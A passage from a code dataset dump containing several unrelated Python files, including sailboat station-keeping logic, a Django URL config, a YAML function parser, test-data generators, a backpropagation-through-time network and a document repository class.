= standardcalc.GPSDistAway(rightMidpnt, wayPntDist2, -wayPntDist1)\n wayPtCoords[2] = standardcalc.GPSDistAway(botMidpnt, -wayPntDist1, -wayPntDist2)\n wayPtCoords[3] = standardcalc.GPSDistAway(leftMidpnt, -wayPntDist2, wayPntDist1)\n \n return wayPtCoords\n\n\ndef SKTimer():\n gVars.SKMinLeft = ((datetime.now() - gVars.taskStartTime ).seconds) / 60\n gVars.SKSecLeft = ((datetime.now() - gVars.taskStartTime ).seconds) - gVars.SKMinLeft*60\n gVars.SKMilliSecLeft = ((datetime.now() - gVars.taskStartTime).microseconds) / 1000\n\ndef getBoxDist(boxCoords):\n boxDistList = [] #top, right, bottom, left\n TL2Boat = standardcalc.distBetweenTwoCoords(gVars.currentData[sVars.GPS_INDEX], boxCoords[0]) #top left to boat\n TR2Boat = standardcalc.distBetweenTwoCoords(gVars.currentData[sVars.GPS_INDEX], boxCoords[1]) #top right to boat\n BR2Boat = standardcalc.distBetweenTwoCoords(gVars.currentData[sVars.GPS_INDEX], boxCoords[2]) #bottom right to boat\n TL2TR = standardcalc.distBetweenTwoCoords(boxCoords[0], boxCoords[1]) #top left to top right\n TR2BR = standardcalc.distBetweenTwoCoords(boxCoords[1], boxCoords[2]) #top right to bottom right\n \n topLeftAngle = standardcalc.findCosLawAngle(TL2TR, TL2Boat, TR2Boat)\n rightTopAngle = standardcalc.findCosLawAngle(TR2BR, TR2Boat, BR2Boat)\n \n boxDistList[0] = TL2Boat * math.sin(topLeftAngle) #top dist\n boxDistList[1] = TR2Boat * math.sin(rightTopAngle) #right dist\n boxDistList[2] = 40 - boxDistList[0] #bottom dist\n boxDistList[3] = 40 - boxDistList[1] #left dist\n return boxDistList\n\ndef stationKeepInit(topLeftWaypnt, topRightWaypnt, botLeftWaypnt, botRightWaypnt):\n topLeftCoord = topLeftWaypnt.coordinate\n topRightCoord = topRightWaypnt.coordinate\n botLeftCoord = botLeftWaypnt.coordinate\n botRightCoord = botRightWaypnt.coordinate\n boxCoords = standardcalc.setBoxCoords(topLeftCoord, topRightCoord, botLeftCoord, botRightCoord) #boxCoords[0] = TL, boxCoords[1] = TR, boxCoords[2] = BR, boxCoords[3] = BL\n wayPtCoords = setWayPtCoords(boxCoords) #top, right, bottom, left\n spdList = [0.75]*10\n boxDistList = getBoxDist(boxCoords) #top, right, bottom, left\n meanSpd = 0.75 #from old arduino code\n arduino = gVars.arduino\n gVars.SKCurrentWaypnt = boxDistList.index(min(boxDistList))\n logger = SBLogger.logger()\n thread.start_new_thread(coresailinglogic.pointToPoint, boxCoords[gVars.SKCurrentWaypnt])\n logger.info(\"The current waypoint is \" + gVars.SKCurrentWaypnt + \". 0 means top, 1 means right, 2 means bottom, 3 means left\")\n logger.info(\"Station Keeping Initialization finished. Now running Station Keeping Challenge\")\n run(boxCoords, wayPtCoords, spdList, meanSpd, arduino, logger)\n return\n \ndef run(boxCoords, wayPtCoords, spdList, meanSpd, arduino, logger):\n exiting = 0\n while (((datetime.now() - gVars.taskStartTime).seconds < 300) and (gVars.kill_flagSK == 0)):\n secLeft = 300 - (datetime.now() - gVars.taskStartTime).seconds\n turning = 0\n SKTimer()\n boxDistList = getBoxDist(boxCoords)\n if (exiting == 0):\n if (standardcalc.isWPNoGo(gVars.currentData[sVars.AWA_INDEX],gVars.currentData[sVars.HOG_INDEX], gVars.SKCurrentWaypnt, gVars.currentData[sVars.SOG_INDEX], gVars.currentData[sVars.GPS_INDEX])):\n logger.info(\"The boat is sailing upwind. Changing current waypoint.\")\n gVars.SKCurrentWaypnt = (gVars.SKCurrentWaypnt + 1) % 4\n logger.info(\"The current waypoint is \" + gVars.SKCurrentWaypnt + \". 0 means top, 1 means right, 2 means bottom, 3 means left\")\n gVars.kill_flagPTP = 1\n thread.start_new_thread(coresailinglogic.pointToPoint, boxCoords[gVars.SKCurrentWaypnt])\n turning = 1\n if (boxDistList[gVars.SKCurrentWaypnt] < 5):\n logger.info(\"The boat is too close to an edge. Changing current waypoint.\")\n gVars.SKCurrentWaypnt = (gVars.SKCurrentWaypnt + 2) % 4\n logger.info(\"The current waypoint is \" + gVars.SKCurrentWaypnt + \". 0 means top, 1 means right, 2 means bottom, 3 means left\")\n gVars.kill_flagPTP = 1\n logger.info(\"Commencing gybe.\")\n if (gVars.currentData[sVars.AWA_INDEX] < 0):\n arduino.gybe(1)\n else:\n arduino.gybe(0)\n thread.start_new_thread(coresailinglogic.pointToPoint, boxCoords[gVars.SKCurrentWaypnt])\n turning = 1\n if (turning == 0):\n spdList = standardcalc.changeSpdList(spdList)\n meanSpd = standardcalc.meanOfList(spdList)\n logger.info(\"The mean speed of the boat is \" + meanSpd + \" metres per second.\")\n if (boxDistList[gVars.SKCurrentWaypnt] >= meanSpd*(secLeft+2)): #leeway of 2 seconds\n exiting = 1\n logger.info(\"Station Keeping event is about to end. Exiting to current waypoint.\")\n elif (boxDistList[(gVars.SKCurrentWaypnt + 2) % 4] >= meanSpd*(secLeft+2+4) ): #leeway of 2 seconds, 4 seconds for gybe\n gVars.SKCurrentWaypnt = (gVars.SKCurrentWaypnt + 2) % 4\n gVars.kill_flagPTP = 1\n logger.info(\"Station Keeping event is about to end. Gybing and exiting to waypoint \" + gVars.SKCurrentWaypnt)\n if (gVars.currentData[sVars.AWA_INDEX] < 0):\n arduino.gybe(1)\n else:\n arduino.gybe(0)\n thread.start_new_thread(coresailinglogic.pointToPoint, boxCoords[gVars.SKCurrentWaypnt])\n exiting = 1\n if (gVars.kill_flagSK == 1):\n logger.info(\"Station Keeping Kill Flag initialized. Station Keeping Challenge has been stopped.\")\n else:\n logger.info(\"Station Keeping Challenge timer has ended.\")\n boxDistList = getBoxDist(boxCoords)\n gVars.SKMinLeft = 0\n gVars.SKSecLeft = 0\n gVars.SKMilliSecLeft = 0\n gVars.kill_flagSK = 0\n gVars.SKCurrentWaypnt = None\n \n return","sub_path":"control/challenge/stationkeeping.py","file_name":"stationkeeping.py","file_ext":"py","file_size_in_byte":8737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"20604800","text":"\"\"\"timetracker URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url, patterns\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\n\nurlpatterns = [\n url(r'^$', 'timetracker.views.index', name=\"index\"),\n url(r'^activities/', include('timetrack.urls', namespace=\"timetrack\")),\n url(r'^login/$', 'timetracker.views.login_view', name=\"login\"),\n url(r'^loginuser/$', 'timetracker.views.login_user', name=\"login_user\"),\n url(r'^logout/$', 'timetracker.views.logout_user', name=\"logout_user\"),\n url(r'^admin/', include(admin.site.urls)),\n]\n\nurlpatterns += patterns(\n '',\n url(r'^404/$', TemplateView.as_view(template_name='404.html')),\n url(r'^500/$', TemplateView.as_view(template_name='500.html')),\n)\n","sub_path":"timetracker/timetracker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"129875483","text":"def intersection(arrays):\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n # Your code here\n result = []\n hash_table = {}\n count = len(arrays)\n\n for single_array in arrays:\n for number in single_array:\n if number not in hash_table:\n hash_table[number] = 1\n else:\n hash_table[number] += 1\n if hash_table[number] == len(arrays):\n result.append(number)\n # print(hash_table) \n return result\n\n\nif __name__ == \"__main__\":\n arrays = []\n\n arrays.append(list(range(1000000, 2000000)) + [1, 2, 3])\n arrays.append(list(range(2000000, 3000000)) + [1, 2, 3])\n arrays.append(list(range(3000000, 4000000)) + [1, 2, 3])\n\n print(intersection(arrays))\n","sub_path":"hashtables/ex3/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"373308987","text":"# SCAR - Serverless Container-aware ARchitectures\n# Copyright (C) GRyCAP - I3M - UPV\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport yaml\nimport os\n\nclass Function:\n def __init__(self, name, image):\n self.name = name\n self.image_id = image\n\nclass YamlParser(object):\n \n def __init__(self, args):\n file_path = args.conf_file\n self.func = args.func\n if os.path.isfile(file_path):\n with open(file_path) as cfg_file:\n self.__setattr__(\"yaml_data\", yaml.safe_load(cfg_file))\n \n def parse_arguments(self):\n functions = []\n for function in self.yaml_data['functions']:\n functions.append(self.parse_function(function, self.yaml_data['functions'][function]))\n return functions[0]\n \n def parse_function(self, function_name, function_data):\n args = {'func' : self.func }\n # Get function name\n args['name'] = function_name\n # Parse function information\n if 'image' in function_data:\n args['image_id'] = function_data['image']\n if 'image_file' in function_data:\n args['image_file'] = function_data['image_file']\n if 'time' in function_data:\n args['time'] = function_data['time']\n if 'memory' in function_data:\n args['memory'] = function_data['memory']\n if 'timeout_threshold' in function_data:\n args['timeout_threshold'] = function_data['timeout_threshold']\n if 'lambda_role' in function_data:\n args['lambda_role'] = function_data['lambda_role']\n if 'description' in function_data:\n args['description'] = function_data['description']\n if 'init_script' in function_data:\n args['init_script'] = function_data['init_script']\n if 'run_script' in function_data:\n args['run_script'] = function_data['run_script'] \n if 'extra_payload' in function_data:\n args['extra_payload'] = function_data['extra_payload']\n if 'log_level' in function_data:\n args['log_level'] = function_data['log_level']\n if 'environment' in function_data:\n variables = []\n for k,v in function_data['environment'].items():\n variables.append(str(k) + '=' + str(v))\n args['environment_variables'] = variables\n # LOG COMMANDS\n if 'log_stream_name' in function_data:\n args['log_stream_name'] = function_data['log_stream_name']\n if 'request_id' in function_data:\n args['request_id'] = function_data['request_id']\n \n if 'data_binary' in function_data:\n args['data_binary'] = function_data['data_binary']\n \n if 's3' in function_data:\n s3_data = function_data['s3']\n if 'deployment_bucket' in s3_data:\n args['deployment_bucket'] = s3_data['deployment_bucket']\n if 'input_bucket' in s3_data:\n args['input_bucket'] = s3_data['input_bucket']\n if 'input_folder' in s3_data:\n args['input_folder'] = s3_data['input_folder']\n if 'output_bucket' in s3_data:\n args['output_bucket'] = s3_data['output_bucket']\n if 'output_folder' in s3_data:\n args['output_folder'] = s3_data['output_folder']\n if 'api_gateway' in function_data:\n api_data = function_data['api_gateway']\n if 'name' in api_data:\n args['api_gateway_name'] = api_data['name']\n if 'parameters' in api_data:\n args['parameters'] = api_data['parameters']\n return args\n ","sub_path":"src/parser/yaml.py","file_name":"yaml.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"599726622","text":"# coding=utf-8\nfrom collections import defaultdict\n\nimport pandas as pd\nfrom faker import Factory\nfrom sklearn.base import TransformerMixin, BaseEstimator\nfrom sklearn.utils import check_random_state\n\n# The default number of sample returned by generators\nNB_SAMPLE = 10\n\n\nclass TestGenerator(TransformerMixin, BaseEstimator):\n \"\"\"Generate random data in the form of a DataFrame for test purpose.\n\n Can generate:\n * categorical data from a sample\n * numeric data between a range\n * time series data as the index at a given start date and with a given frequency\n\n Parameters\n ----------\n freq: string (default='D')\n Frequency compliant with the pandas frequency aliases.\n start_date: string or datetime-like, (default='today')\n The first date of the index.\n categ_sample: list (default=('foo', 'bar'))\n The list of values used to generate categorical data.\n num_sample: list (default=('foo', 'bar'))\n The list of values used to generate categorical data.\n nb_sample: int (default=NB_SAMPLE)\n The number of sample (row) to generate.\n random_state : RandomState or an int seed (default=0)\n A random number generator instance to define the state of the random permutations generator.\n Returns\n -------\n df_converted\n The DataFrame with normalized columns.\n \"\"\"\n\n def __init__(self, freq='D', start_date='today', categ_sample=('foo', 'bar'), num_sample=(0, 100),\n nb_sample=NB_SAMPLE, random_state=0):\n self.freq = freq\n self.start_date = start_date\n self.categ_sample = categ_sample\n self.num_sample = num_sample\n self.nb_sample = nb_sample\n self.random_state = random_state\n\n def transform(self, X, **transform_params):\n random_state = check_random_state(self.random_state)\n # Generating a sample and selecting a subset to randomize them\n df = pd.DataFrame({'categ': random_state.choice(self.categ_sample, self.nb_sample),\n 'number': random_state.randint(self.num_sample[0], self.num_sample[1], self.nb_sample)\n },\n index=random_state.choice(\n pd.date_range(start=pd.to_datetime(self.start_date), periods=self.nb_sample * 3,\n freq=self.freq),\n self.nb_sample))\n # DateTimeIndex shall be sorted\n df.sort_index(inplace=True)\n return df\n\n def fit(self, X, y=None, **fit_params):\n # Does nothing\n return self\n\n\nclass FakeGenerator(TransformerMixin, BaseEstimator):\n \"\"\"A Fake generator wrapping the Faker data generator http://fake-factory.readthedocs.org/en/stable/.\n\n Parameters\n ----------\n fakes: list (default=('name', 'address', 'text']))\n The list of fake to generate, a column by fake will be generated\n locale: string (default=None)\n The locale to use, see the Faker documentation.\n nb_sample: int (default=NB_SAMPLE)\n The number of sample (row) to generate.\n random_state : RandomState or an int seed (default=0)\n A random number generator instance to define the state of the random permutations generator.\n\n Returns\n -------\n DataFrame\n Containing the fake values (a column by fake and `nb_sample` rows) with a default index.\n\n Raises\n ------\n ValueError\n If a fake is not supported.\n \"\"\"\n\n def __init__(self, fakes=('name', 'address', 'text'), locale=None, nb_sample=NB_SAMPLE, random_state=0):\n self.fakes = fakes\n self.locale = locale\n self.nb_sample = nb_sample\n self.random_state = random_state\n\n def transform(self, X, **transform_params):\n _data = defaultdict(list)\n faker = Factory.create(self.locale)\n random_state = check_random_state(self.random_state)\n faker.seed(self.random_state)\n for sample in range(self.nb_sample):\n for fk in self.fakes:\n try:\n _data[fk].append(getattr(faker, fk)())\n except AttributeError as e:\n _msg = 'Fake [%s] not supported' % fk\n raise Exception(_msg)\n return pd.DataFrame.from_dict(_data)\n\n def fit(self, X, y=None, **fit_params):\n # Does nothing\n return self","sub_path":"pyranha/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"452251196","text":"import cv2\r\nimport numpy as np\r\n\r\ncam=cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n k=cv2.waitKey(1)\r\n if k & 0xFF==ord('q'):\r\n break\r\n _,frame=cam.read()\r\n img=cv2.inRange(frame,np.array([0,0,0]),np.array([180,255,30]))\r\n im2,contours,hierarchy = cv2.findContours(img, 1, 2)\r\n for i in range(len(contours)):\r\n cnt = contours[i]\r\n area = cv2.contourArea(cnt)\r\n if area>200:\r\n print(area)\r\n cv2.imshow('Image',img)\r\n","sub_path":"Focal_length_calculation/fl_C.py","file_name":"fl_C.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"613355007","text":"\"\"\"FormScribe meta classes.\"\"\"\n\n\nfrom formscribe.error import InvalidFieldError\n\n\nclass MetaField(type):\n \"\"\"Field metaclass.\"\"\"\n\n def __call__(cls, *args, **kwargs):\n instance = object.__new__(cls, *args, **kwargs)\n\n regex_attributes = [getattr(instance, attribute) for attribute in\n ('regex_group', 'regex_group_key', 'regex_key')]\n if any(regex_attributes) and not all(regex_attributes):\n raise InvalidFieldError('The following attributes are required:'\n ' regex_group, regex_group_key,'\n ' regex_key.')\n\n if instance.regex_key and instance.key:\n raise InvalidFieldError('The following attributes are incompatible:'\n ' regex_key, key.')\n\n if not instance.key and not all(regex_attributes):\n raise InvalidFieldError('Field must be either key-based or'\n ' regex-based.')\n\n instance.__init__()\n\n try:\n automatically_validate = kwargs['automatically_validate']\n except KeyError:\n try:\n automatically_validate = args[1]\n except IndexError:\n automatically_validate = True\n\n if automatically_validate:\n try:\n return instance.validate(kwargs['value'])\n except KeyError:\n try:\n return instance.validate(args[0])\n except IndexError:\n pass\n\n return instance\n","sub_path":"formscribe/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"613101452","text":"import numpy as np\nfrom mlp.activation_functions import Sigmoid\nfrom sklearn.metrics import accuracy_score\nfrom mlp import NeuralNet\nfrom mlp.util import BSSF\nfrom rnn import util\n\n\nclass BPTT(NeuralNet):\n def __init__(self, features=6, hidden=60, classes=7,\n u_back=(0, 20), u_forward=(-21, -1), v_range=(10, 50), k_back=1, k_forward=1,\n learning_rate=0.9, a_func=Sigmoid, max_epochs=1000, patience=20,\n validation_set=None, multi_vsets=False, classification=True):\n self.H = np.arange(hidden)\n # get correct indexes\n self._k = k_back\n self._j = k_forward\n # setup extra matrices and values\n self._hb = u_back\n self._hf = u_forward\n self._v = v_range\n # recurrent matrices\n self.V = self.input_matrix(features, *v_range)\n if u_back and k_back > 0:\n self.Ub = self.recurrent_matrix(*u_back)\n self.δb = self.delta_vecs(u_back, k_back)\n self.Zb = self.Z_vecs(hidden, k_back)\n self.Zin_b = self.Z_vecs(features, k_back)\n if u_forward and k_forward > 0:\n self.Uf = self.recurrent_matrix(*u_forward)\n self.δf = self.delta_vecs(u_forward, k_forward)\n self.Zf = self.Z_vecs(hidden, k_forward)\n self.Zin_f = self.Z_vecs(features, k_forward)\n super().__init__(features, hidden, classes, learning_rate, a_func, max_epochs, patience, validation_set,\n multi_vsets, classification)\n # overwrite W so there's only one\n self.W = np.random.randn(hidden, classes)\n print(\"BPTT!\")\n\n def fit(self, X, Y, multi_sets=False):\n epoch = 0\n Δp = 0\n bssf = BSSF(self.W, self.b, 0)\n if not multi_sets:\n X = [X]\n Y = [Y]\n while epoch < self._max_epochs and Δp < self._patience:\n idx = util.get_indices(X, multi_sets, self._k, self._j)\n for i, j in idx:\n self._forward_prop_tt(X[i], j)\n self._back_prop(Y[i][j])\n epoch += 1\n # Do validation check\n if self._VS:\n score = self.score(self._VS[0], self._VS[1], multi_sets=self._multi_vsets)\n if score > bssf.score:\n bssf = BSSF(self.W, self.b, score)\n Δp = 0\n else:\n Δp += 1\n # if training stopped because of patience, use bssf instead\n if self._VS and Δp >= self._patience:\n self.W = bssf.W\n self.b = bssf.b\n return epoch\n\n # region Predict and Score\n def predict(self, X, multi_sets=False):\n out = []\n if not multi_sets:\n X = [X]\n idx = util.get_indices(X, multi_sets, self._k, self._j, shuffle=False)\n for i, j in idx:\n z = self._forward_prop_tt(X[i], j)\n if self._classification:\n q = np.zeros(z.shape)\n q[z.argmax()] = 1.\n out.append(q)\n else:\n out.append(z)\n return np.array(out)\n\n def score(self, X, y, sample_weight=None, multi_sets=False):\n y2 = []\n if not multi_sets:\n y = [y]\n idx = util.get_indices(y, multi_sets, self._k, self._j, shuffle=False)\n for i, j in idx:\n y2.append(y[i][j])\n y2 = np.array(y2)\n predicted = self.predict(X, multi_sets)\n return accuracy_score(y2, predicted, sample_weight=sample_weight)\n # endregion\n\n def _forward_prop_tt(self, Xi, j):\n # initial activation of hidden layer\n self.Z[1] = np.ones(self.Z[1].shape)\n self.Z[1] *= .0001\n # backwards t\n if self.Ub is not None:\n t = self._k\n for i in range(self._k):\n x = Xi[j-t+i]\n xt = x.reshape(1, len(x))\n self.Zin_b[i] = xt\n self.Z[1][:,slice(*self._v)] += self.activation(xt.dot(self.V) + self.b[0][:, slice(*self._v)])\n self.Z[1][:,slice(*self._hb)] += self.activation(self.Z[1][:,slice(*self._hb)].dot(self.Ub) +\n self.b[0][:,slice(*self._hb)])\n self.Zb[i] = self.Z[1].copy()\n # t == 0\n x = Xi[j]\n self.x0 = x.reshape(1, len(x))\n self.Z[1][:,slice(*self._v)] += self.activation(self.x0.dot(self.V) + self.b[0][:,slice(*self._v)])\n # forwards t\n if self.Uf is not None:\n for i in range(self._j):\n x = Xi[j+i+1]\n xt = x.reshape(1, len(x))\n self.Z[1][:,slice(*self._v)] += self.activation(xt.dot(self.V) + self.b[0][:,slice(*self._v)])\n self.Z[1][:,slice(*self._hf)] += self.activation(self.Z[1][:,slice(*self._hf)].dot(self.Ub) +\n self.b[0][:,slice(*self._hf)])\n self.Zf[i] = self.Z[1].copy()\n # output layer\n self.Z[-1] = self.activation(self.Z[-2].dot(self.W) + self.b[-1])\n return self.Z[-1][0]\n\n def _back_prop(self, y):\n # output layer's delta: δ = (T-Z) * f'(net)\n self.δ[-1] = (y - self.Z[-1]) * self.f_prime(self.Z[-1])\n # compute deltas: δj = Σ[δk*Wjk] * f'(net)\n self.δ[0] = np.zeros(self.δ[0].shape) # initially clear\n # t backwards\n if self.Ub is not None:\n self.δb[-1] = np.tensordot(self.δ[-1], self.W, (1, 1))[:,slice(*self._hb)] * self.f_prime(self.Zb[-1][:,slice(*self._hb)])\n for i in range(self._k-1, 0, -1):\n self.δb[i-1] = np.tensordot(self.δb[i], self.Ub, (1, 1)) * self.f_prime(self.Zb[i][:,slice(*self._hb)])\n # t == 0\n self.δ[0][:,slice(*self._v)] = np.tensordot(self.δ[-1], self.W, (1, 1))[:,slice(*self._v)] * self.f_prime(self.Z[1][:,slice(*self._v)])\n # t forwards\n if self.Uf is not None:\n self.δf[-1] = np.tensordot(self.δ[-1], self.W, (1, 1))[:,slice(*self._hf)] * self.f_prime(self.Zf[-1][:,slice(*self._hf)])\n for i in range(self._j-1, 0, -1):\n self.δf[i-1] = np.tensordot(self.δf[i], self.Uf, (1, 1)) * self.f_prime(self.Zf[i][:,slice(*self._hf)])\n\n # update weights: ΔWij = C*δj*Zi\n # output layer\n self.W += self.C * np.outer(self.Z[1], self.δ[-1])\n self.b[-1] += self.C * self.δ[-1]\n # recurrent layers\n ΔV = np.zeros(self.V.shape)\n nv = np.zeros(self.V.shape)\n Δb = np.zeros(self.b[0].shape)\n nb = np.zeros(self.b[0].shape)\n # backwards\n if self.Ub is not None:\n ΔUb = np.zeros(self.Ub.shape)\n for i in range(self._k):\n ΔUb += self.C * np.outer(self.Zb[i][:,slice(*self._hf)], self.δb[i])\n ΔV[:,slice(*self._hb)] += self.C * np.outer(self.Zin_b[i], self.δb[i])\n nv[:,slice(*self._hb)] += 1\n Δb[:,slice(*self._hb)] += self.C * self.δb[i]\n nb[:,slice(*self._hb)] += 1\n ΔUb /= self._k\n self.Ub += ΔUb\n # t == 0\n ΔV += self.C * np.outer(self.x0, self.δ[0][:,slice(*self._v)])\n nv += 1\n Δb[:,slice(*self._v)] += self.C * self.δ[0][:,slice(*self._v)]\n nb[:,slice(*self._v)] += 1\n # forwards\n if self.Uf is not None:\n ΔUf = np.zeros(self.Uf.shape)\n for i in range(self._j):\n ΔUf += self.C * np.outer(self.Zf[i][:,slice(*self._hf)], self.δf[i])\n ΔV[:,slice(*self._hf)] += self.C * np.outer(self.Zin_f[i], self.δf[i])\n nv[:,slice(*self._hf)] += 1\n Δb[:,slice(*self._hf)] += self.C * self.δf[i]\n nb[:,slice(*self._hf)] += 1\n ΔUf /= self._j\n self.Uf += ΔUf\n ΔV /= nv\n Δb = Δb / nb\n self.V += ΔV\n self.b[0] += Δb\n\n def recurrent_matrix(self, start, stop):\n _len = self.H[stop] - self.H[start]\n return np.random.randn(_len, _len)\n\n def input_matrix(self, f, start, stop):\n _len = self.H[stop] - self.H[start]\n return np.random.randn(f, _len)\n\n def delta_vecs(self, h, k):\n start, stop = h\n _len = self.H[stop] - self.H[start]\n δ = []\n for i in range(k):\n δ.append(np.zeros(_len))\n return δ\n\n def Z_vecs(self, hidden, k):\n _Z = []\n for i in range(k):\n _Z.append(np.zeros(hidden))\n return _Z","sub_path":"rnn/bptt.py","file_name":"bptt.py","file_ext":"py","file_size_in_byte":8550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"74797797","text":"\n\nimport sqlite3\nimport os\n\"\"\"\n- How many total Characters are there?\n- How many of each specific subclass?\n- How many total Items?\n- How many of the Items are weapons? How many are not?\n- How many Items does each character have? (Return first 20 rows)\n- How many Weapons does each character have? (Return first 20 rows)\n- On average, how many Items does each Character have?\n- On average, how many Weapons does each character have?\n\n\"\"\"\n\ndef connect_to_db(db_name=\"rpg_db.sqlite3\"):\n return sqlite3.connect(db_name)\n\ndef execute_query(cursor, query):\n cursor.execute(query)\n return cursor.fetchall()\nGET_CHARACTERS = \"\"\"\nSELECT count(character_id) FROM charactercreator_character;\n-- how many total characters are there\n\"\"\"\nGET_CHARACTERS = \"\"\"\nSELECT count(character_id) FROM charactercreator_character;\n-- how each specific sub class\n\"\"\"\n\n\n\n\nif __name__ == \"__main__\":\n conn = connect_to_db()\n curs = conn.cursor()\n results = execute_query(curs, GET_CHARACTERS)\n print(results)\n\n\n","sub_path":"module1-introduction-to-sql/rpg_work.py","file_name":"rpg_work.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"628598270","text":"from models import DigitalDocumentModel\nfrom utilities import ObjectValidation\nfrom anuvaad_auditor.errorhandler import post_error\nfrom datetime import datetime\nimport uuid\nfrom utilities import AppContext\nfrom anuvaad_auditor.loghandler import log_info, log_exception\nimport json\n\nvalidator=ObjectValidation()\n\nclass DigitalDocumentRepositories:\n \n def __init__(self):\n self.docModel=DigitalDocumentModel()\n\n def store(self, userID, recordID, files): \n try:\n for file in files:\n\n # recordID= recordID\n jobID= recordID.split('|')[0]\n fileID=file['file']['identifier']\n file_name=file['file']['name']\n locale=file['config']['language']\n file_type=file['file']['type']\n\n pages =file['pages']\n log_info(\"DigitalDocumentRepo save document for user: {}| record: {}| count of pages received: {}\".format(userID,recordID,str(len(pages))), AppContext.getContext())\n \n blocks=[] \n for page in pages:\n block=self.create_regions_from_page(userID,jobID,recordID,fileID,file_name,locale,file_type,page)\n if len(block.keys())>5:\n blocks.append(block)\n else:\n return block\n log_info('DigitalDocumentRepo page blocks created for insert, user_id:{}, record_id:{}, block length:{}'.format(userID, recordID,str(len(blocks))), AppContext.getContext())\n result=self.docModel.store_bulk_blocks(blocks)\n if result == False:\n return False \n except Exception as e:\n AppContext.addRecordID(recordID)\n log_exception('Exception on save document | DigitalDocumentRepo :{}'.format(str(e)), AppContext.getContext(), e)\n return post_error(\"Data Missing\",\"Failed to store doc since :{}\".format(str(e)),None)\n \n\n\n def update_words(self, user_id, words):\n\n for word in words:\n Validation= validator.update_word_validation(word)\n if Validation is not None:\n return Validation\n\n page=word['page_no']\n region_id=word['region_id']\n word_id=word['word_id']\n record_id=word['record_id']\n user_word = word['updated_word']\n\n AppContext.addRecordID(record_id)\n log_info(\"DigitalDocumentRepo update word request\", AppContext.getContext())#str(page)\n region_to_update= self.docModel.get_word_region(user_id,record_id,region_id,page)\n if region_to_update:\n if region_to_update['identifier']== region_id :\n region_to_update['updated']=True\n for data in region_to_update['regions']:\n for word in data['regions']:\n if word['identifier']==word_id:\n word['ocr_text']=word['text']\n word['text']=user_word\n break\n else:\n pass\n # return post_error(\"Data Missing\",\"No record with the given user_id,record_id and word_id\",None)\n else:\n return post_error(\"Data Missing\",\"No record with the given user_id,record_id and region_id\",None)\n \n \n AppContext.addRecordID(record_id)\n log_info(\"DigitalDocumentRepo update word region :{}\".format(str(region_to_update)), AppContext.getContext())\n print(region_to_update)\n if self.docModel.update_word(user_id,record_id,region_id,region_to_update,page) == False:\n return post_error(\"Data Missing\",\"Failed to update word since data is missing\",None)\n return True\n\n\n def get_pages(self, record_id, start_page=1, end_page=5):\n\n total_page_count = self.docModel.get_document_total_page_count(record_id)\n if start_page == 0 and end_page == 0:\n start_page = 1\n end_page = total_page_count\n \n if start_page == 0:\n start_page = 1\n if end_page == 0:\n end_page = 5\n if start_page > end_page:\n return False\n if start_page > total_page_count:\n return False\n\n AppContext.addRecordID(record_id)\n log_info(\"DigitalDocumentRepo fetching doc by pages for record_id:{}\".format(str(record_id)), AppContext.getContext())\n pages = []\n data = {}\n data_page = []\n for i in range(start_page, end_page+1):\n page_block = self.docModel.get_record_by_page(record_id, i)\n if page_block == False:\n return False\n else:\n data_page.append(page_block)\n \n \n pg_block_formated=self.format_page_data(data_page)\n\n data['pages'] = pg_block_formated\n data['start_page'] = start_page\n data['end_page'] = end_page\n data['total'] = total_page_count\n return data\n\n \n def create_regions_from_page(self,userID,jobID,recordID,fileID,file_name,locale,file_type,page):\n try:\n AppContext.addRecordID(recordID)\n log_info('DigitalDocumentRepo page blocks creation started for record_id:{}, page_number:{}'.format(recordID,str(page['page_no'])), AppContext.getContext())\n block_info = {}\n block_info['userID']=userID\n block_info['jobID']=jobID\n block_info['recordID']=recordID\n block_info['file_identifier']=fileID\n block_info['file_name']=file_name\n block_info['file_locale']=locale\n block_info['file_type']= file_type\n block_info['created_on']=datetime.utcnow()\n\n\n page_info = {}\n page_info['page_no'] = page['page_no'] + 1\n page_info['page_identifier'] = page['identifier']\n page_info['page_boundingBox'] = page['boundingBox']\n page_info['page_img_path'] = page['path']\n if 'resolution' in page.keys():\n page_info['page_resolution'] = page['resolution']\n\n block_info['page_info'] = page_info\n\n block_info['regions'] = page['regions']\n return block_info\n except Exception as e:\n 